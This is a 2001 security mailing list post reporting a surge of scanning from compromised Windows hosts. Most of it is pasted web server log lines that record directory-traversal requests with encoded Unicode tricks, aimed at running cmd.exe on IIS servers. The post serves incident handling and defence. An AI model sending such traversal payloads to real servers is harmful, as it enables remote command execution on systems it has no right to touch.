Security Incidents mailing list archives

Rekindled sploit scanning?


From: Aj Effin Reznor <aj () reznor com>
Date: Tue, 18 Sep 2001 07:08:04 -0700 (PDT)

Looks like a fair amount of traffic this morning amongst compromised NT/2k boxen.

The 63.x.y.z as well as the 65.x.y.z is seeing a fair amount of traffic, similar to the following:


aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"


Log times are PST.


-aj.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

